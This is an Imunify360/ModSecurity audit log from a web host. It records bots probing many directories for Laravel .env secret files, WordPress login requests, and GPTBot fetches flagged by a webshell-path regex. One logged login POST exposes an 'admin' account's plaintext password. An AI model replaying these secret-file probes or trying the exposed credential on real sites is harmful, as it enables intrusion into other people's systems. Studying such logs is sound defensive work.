[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/about-us.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281371846343 19198 (- - -) Stopwatch2: 1751281371846343 19198; combined=4065, p1=162, p2=3708, p3=0, p4=0, p5=194, sr=59, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f2971732-Z-- --8f744c0a-A-- [30/Jun/2025:16:32:53.322660 +0530] aGJu3fjour-43Nq0cetnSQAAAFY 192.253.209.63 37319 192.168.74.40 443 --8f744c0a-B-- POST /redmine/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --8f744c0a-C-- 0x%5B%5D=DTAB --8f744c0a-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --8f744c0a-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281373144300 178935 (- - -) Stopwatch2: 1751281373144300 178935; combined=2199, p1=406, p2=1340, p3=0, p4=0, p5=453, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8f744c0a-Z-- --46dc5a36-A-- [30/Jun/2025:16:32:53.656387 +0530] aGJu2ytJXhRZGlU1BjiMhwAAAAw 45.133.113.189 36343 192.168.74.40 443 --46dc5a36-B-- GET /wp-login.php HTTP/1.1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203 accept-encoding: gzip, deflate, br cookie: humans_21909=1 Host: thewizblog.com Connection: close --46dc5a36-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --1da1ff19-Z-- --f1ff8f12-A-- [30/Jun/2025:16:32:54.630082 +0530] aGJu3nVeW8g-tV0lUXg8_AAAAFQ 192.253.209.62 33301 192.168.74.40 443 --f1ff8f12-B-- GET /docker/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --f1ff8f12-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --f1ff8f12-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281374559808 70442 (- - -) Stopwatch2: 1751281374559808 70442; combined=812, p1=100, p2=516, p3=0, p4=0, p5=196, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --f1ff8f12-Z-- --03e1ef09-A-- [30/Jun/2025:16:32:55.373355 +0530] aGJu354tZwI9VhjyFFR7ZAAAAEI 20.171.207.232 33346 192.168.74.40 443 --03e1ef09-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/aainag/tnc.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --03e1ef09-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --03e1ef09-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/aainag/tnc.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/aainag/tnc.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281375359175 14385 (- - -) Stopwatch2: 1751281375359175 14385; combined=2492, p1=128, p2=2245, p3=0, p4=0, p5=118, sr=52, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2bcf497e-Z-- --bc6ba84b-A-- [30/Jun/2025:16:32:56.115968 +0530] aGJu3zI3fPBAC9f2U0qZLgAAADA 192.253.209.97 20859 192.168.74.40 443 --bc6ba84b-B-- POST /docker/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --bc6ba84b-C-- 0x%5B%5D=DTAB --bc6ba84b-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --bc6ba84b-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281375997612 118994 (- - -) Stopwatch2: 1751281375997612 118994; combined=2106, p1=155, p2=1561, p3=0, p4=0, p5=389, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bc6ba84b-Z-- --b0accc7d-A-- [30/Jun/2025:16:32:56.533659 +0530] aGJu4J4tZwI9VhjyFFR7ZQAAAEI 20.171.207.232 33346 192.168.74.40 443 --b0accc7d-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/tnc.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b0accc7d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b0accc7d-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/tnc.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --b0accc7d-Z-- --d24a9937-A-- [30/Jun/2025:16:32:57.324406 +0530] aGJu4WPCqdxeyafedPa9WgAAAAk 192.253.209.58 35891 192.168.74.40 443 --d24a9937-B-- GET /cms/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive --d24a9937-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --d24a9937-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281377276349 48597 (- - -) Stopwatch2: 1751281377276349 48597; combined=1015, p1=152, p2=666, p3=0, p4=0, p5=197, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d24a9937-Z-- --f97a0855-A-- [30/Jun/2025:16:32:57.629713 +0530] aGJu3kX42eYDQRTIrig3OgAAAB0 193.233.210.216 21453 192.168.74.40 443 --f97a0855-B-- POST /wp-login.php HTTP/1.1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203 referer: https://thewizblog.com/wp-login.php content-type: application/x-www-form-urlencoded content-length: 143 accept-encoding: gzip, deflate, br cookie: humans_21909=1; wordpress_test_cookie=WP%20Cookie%20check Host: thewizblog.com Connection: close --f97a0855-C-- log=admin&pwd=Marketingtech%40123%23%24&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fthewizblog.com%2Fwp-admin%2F&testcookie=1 --f97a0855-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ebb1f97e-Z-- --638b3a45-A-- [30/Jun/2025:16:32:58.663018 +0530] aGJu4hcq64WljHnUEmPX9wAAABQ 192.253.209.68 40383 192.168.74.40 443 --638b3a45-B-- POST /cms/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --638b3a45-C-- 0x%5B%5D=DTAB --638b3a45-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --638b3a45-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281378623560 40113 (- - -) Stopwatch2: 1751281378623560 40113; combined=2137, p1=171, p2=1518, p3=0, p4=0, p5=448, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --638b3a45-Z-- --ffd23e27-A-- [30/Jun/2025:16:32:58.827438 +0530] aGJu4p4tZwI9VhjyFFR7ZwAAAEI 20.171.207.232 33346 192.168.74.40 443 --ffd23e27-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/js/large.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --ffd23e27-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ffd23e27-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/js/large.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --2ab9ca72-Z-- --18e75e1b-A-- [30/Jun/2025:16:33:00.085903 +0530] aGJu5MNDEoPcf0uXTmEV9QAAAEc 192.253.209.107 44705 192.168.74.40 443 --18e75e1b-B-- GET /script/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --18e75e1b-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --18e75e1b-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281380041947 44289 (- - -) Stopwatch2: 1751281380041947 44289; combined=1147, p1=126, p2=847, p3=0, p4=0, p5=174, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --18e75e1b-Z-- --2ed8ae4b-A-- [30/Jun/2025:16:33:00.989447 +0530] aGJu40X42eYDQRTIrig3OwAAAB0 45.159.23.11 61147 192.168.74.40 443 --2ed8ae4b-B-- GET /wp-login.php HTTP/1.1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203 accept-encoding: gzip, deflate, br cookie: humans_21909=1 Host: thewizblog.com Connection: close --2ed8ae4b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --eee56b0a-Z-- --b73ccb7c-A-- [30/Jun/2025:16:33:01.646697 +0530] aGJu5UX42eYDQRTIrig3PAAAAB0 192.253.209.74 10823 192.168.74.40 443 --b73ccb7c-B-- POST /script/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --b73ccb7c-C-- 0x%5B%5D=DTAB --b73ccb7c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --b73ccb7c-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281381594948 52151 (- - -) Stopwatch2: 1751281381594948 52151; combined=1495, p1=98, p2=988, p3=0, p4=0, p5=409, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b73ccb7c-Z-- --b349337a-A-- [30/Jun/2025:16:33:01.863804 +0530] aGJu5Ams4GQJbNFEXqh5GwAAAFs 205.185.116.195 52503 192.168.74.40 443 --b349337a-B-- GET /wp-login.php HTTP/1.1 Host: laziahomes.com Connection: keep-alive Accept-Encoding: none Accept: */* user-agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 --b349337a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly Keep-Alive: timeout=5, max=100 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --3dc68d48-Z-- --3bdcec57-A-- [30/Jun/2025:16:33:06.384417 +0530] aGJu6p9gn8G79jbwM5vHxwAAAEg 192.253.209.96 44067 192.168.74.40 443 --3bdcec57-B-- GET /application/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --3bdcec57-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --3bdcec57-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281386338562 46265 (- - -) Stopwatch2: 1751281386338562 46265; combined=931, p1=112, p2=610, p3=0, p4=0, p5=208, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --3bdcec57-Z-- --08af2f4b-A-- [30/Jun/2025:16:33:06.960196 +0530] aGJu6p4tZwI9VhjyFFR7bgAAAEI 20.171.207.232 33346 192.168.74.40 443 --08af2f4b-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Folk-Music-Songs.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --08af2f4b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --08af2f4b-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Folk-Music-Songs.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Folk-Music-Songs.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281386941861 18506 (- - -) Stopwatch2: 1751281386941861 18506; combined=4062, p1=177, p2=3717, p3=0, p4=0, p5=168, sr=69, sw=0, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6b2f5462-Z-- --23313659-A-- [30/Jun/2025:16:33:07.574243 +0530] aGJu67xQl4x4ievr02RreAAAAFw 192.253.209.68 30639 192.168.74.40 443 --23313659-B-- POST /application/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --23313659-C-- 0x%5B%5D=DTAB --23313659-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --23313659-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281387510574 64032 (- - -) Stopwatch2: 1751281387510574 64032; combined=1526, p1=177, p2=1085, p3=0, p4=0, p5=264, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --23313659-Z-- --80b23163-A-- [30/Jun/2025:16:33:08.151501 +0530] aGJu7J4tZwI9VhjyFFR7bwAAAEI 20.171.207.232 33346 192.168.74.40 443 --80b23163-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/Car-Rentals-Agra.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --80b23163-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --80b23163-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/Car-Rentals-Agra.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --65fcc735-Z-- --28504940-A-- [30/Jun/2025:16:33:08.959066 +0530] aGJu7J9gn8G79jbwM5vHyAAAAEg 192.253.209.100 30239 192.168.74.40 443 --28504940-B-- GET /.env.project%20 HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --28504940-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --28504940-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281388910965 48395 (- - -) Stopwatch2: 1751281388910965 48395; combined=3770, p1=80, p2=3557, p3=0, p4=0, p5=132, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
